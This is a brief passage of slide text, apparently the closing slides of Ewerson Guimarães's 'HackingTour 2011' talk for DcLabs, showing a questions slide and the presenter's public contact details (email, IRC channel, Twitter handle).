  • 30. Questions? Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 31. Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 32. Contact Crash - crash@dclabs.com.br Irc: irc.freenode.net #dclabs twitter: @crashbrz Ewerson Guimarães (Crash) DcLabs – HackingTour 2011